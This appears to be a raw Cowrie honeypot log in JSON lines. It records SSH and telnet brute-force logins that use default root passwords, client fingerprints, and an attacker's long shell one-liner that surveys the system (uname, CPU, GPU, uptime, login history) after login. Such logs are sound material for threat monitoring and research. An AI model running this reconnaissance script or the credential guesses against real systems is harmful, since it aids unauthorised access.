{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.953827Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.954710Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.955503Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.956090Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:09:40.357364Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:40.358593Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:40.359747Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.038894Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:09:41.955962Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.956667Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.957332Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.958292Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.959434Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.960203Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.960964Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.961968Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.962532Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.963286Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.963860Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.964418Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:09:41.964887Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:09:42.542298Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:42.543454Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:42.544937Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.session.closed","duration":12.819345712661743,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:49.497558Z","src_ip":"102.212.42.184","session":"6791fffa6499"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38911,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd10d8d51012","protocol":"telnet","message":"New connection: 102.212.42.184:38911 (1.2.3.4:23) [session: bd10d8d51012]","sensor":"my-vps","timestamp":"2025-09-08T19:09:49.649847Z"}
{"eventid":"cowrie.session.closed","duration":12.797485589981079,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:02.447236Z","src_ip":"102.212.42.184","session":"bd10d8d51012"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":39117,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8f62223be6a","protocol":"telnet","message":"New connection: 102.212.42.184:39117 (1.2.3.4:23) [session: a8f62223be6a]","sensor":"my-vps","timestamp":"2025-09-08T19:10:02.589292Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49954,"dst_ip":"1.2.3.4","dst_port":22,"session":"508da56bd677","protocol":"ssh","message":"New connection: 217.72.205.35:49954 (1.2.3.4:22) [session: 508da56bd677]","sensor":"my-vps","timestamp":"2025-09-08T19:10:10.699751Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:10.701073Z","src_ip":"217.72.205.35","session":"508da56bd677"}
{"eventid":"cowrie.session.closed","duration":12.799214601516724,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:15.388436Z","src_ip":"102.212.42.184","session":"a8f62223be6a"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":39311,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ed7426b8c62","protocol":"telnet","message":"New connection: 102.212.42.184:39311 (1.2.3.4:23) [session: 8ed7426b8c62]","sensor":"my-vps","timestamp":"2025-09-08T19:10:15.520192Z"}
{"eventid":"cowrie.session.closed","duration":12.857197284698486,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:28.377317Z","src_ip":"102.212.42.184","session":"8ed7426b8c62"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":39542,"dst_ip":"1.2.3.4","dst_port":23,"session":"12d1d6020794","protocol":"telnet","message":"New connection: 102.212.42.184:39542 (1.2.3.4:23) [session: 12d1d6020794]","sensor":"my-vps","timestamp":"2025-09-08T19:10:29.537169Z"}
{"eventid":"cowrie.session.closed","duration":13.029268980026245,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:42.566349Z","src_ip":"102.212.42.184","session":"12d1d6020794"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":39761,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef86160b4adf","protocol":"telnet","message":"New connection: 102.212.42.184:39761 (1.2.3.4:23) [session: ef86160b4adf]","sensor":"my-vps","timestamp":"2025-09-08T19:10:42.704827Z"}
{"eventid":"cowrie.session.closed","duration":12.553088665008545,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:10:55.257818Z","src_ip":"102.212.42.184","session":"ef86160b4adf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48618,"dst_ip":"1.2.3.4","dst_port":22,"session":"23e1d83bdd66","protocol":"ssh","message":"New connection: 212.227.235.229:48618 (1.2.3.4:22) [session: 23e1d83bdd66]","sensor":"my-vps","timestamp":"2025-09-08T19:11:13.033896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:11:13.035180Z","src_ip":"212.227.235.229","session":"23e1d83bdd66"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:11:13.332481Z","src_ip":"212.227.235.229","session":"23e1d83bdd66"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T19:11:14.344044Z","src_ip":"212.227.235.229","session":"23e1d83bdd66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48346,"dst_ip":"1.2.3.4","dst_port":22,"session":"86f6db9a1a18","protocol":"ssh","message":"New connection: 212.227.125.160:48346 (1.2.3.4:22) [session: 86f6db9a1a18]","sensor":"my-vps","timestamp":"2025-09-08T19:11:14.837620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:11:14.838476Z","src_ip":"212.227.125.160","session":"86f6db9a1a18"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:11:15.167948Z","src_ip":"212.227.125.160","session":"86f6db9a1a18"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:11:15.679826Z","src_ip":"212.227.235.229","session":"23e1d83bdd66"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T19:11:16.521700Z","src_ip":"212.227.125.160","session":"86f6db9a1a18"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:11:17.869572Z","src_ip":"212.227.125.160","session":"86f6db9a1a18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55080,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fdcbc9d4039","protocol":"telnet","message":"New connection: 212.227.235.229:55080 (1.2.3.4:23) [session: 9fdcbc9d4039]","sensor":"my-vps","timestamp":"2025-09-08T19:11:27.843194Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:11:28.058047Z","src_ip":"212.227.235.229","session":"9fdcbc9d4039"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:11:28.118058Z","src_ip":"212.227.235.229","session":"9fdcbc9d4039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41588,"dst_ip":"1.2.3.4","dst_port":22,"session":"f600b173c2d1","protocol":"ssh","message":"New connection: 212.227.235.229:41588 (1.2.3.4:22) [session: f600b173c2d1]","sensor":"my-vps","timestamp":"2025-09-08T19:12:48.707413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:12:48.709056Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:12:48.993904Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.139358Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39534,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f302ad7b55a","protocol":"ssh","message":"New connection: 212.227.125.160:39534 (1.2.3.4:22) [session: 2f302ad7b55a]","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.789581Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:12:50.894542Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.895281Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:12:50.895996Z","src_ip":"212.227.235.229","session":"f600b173c2d1"}
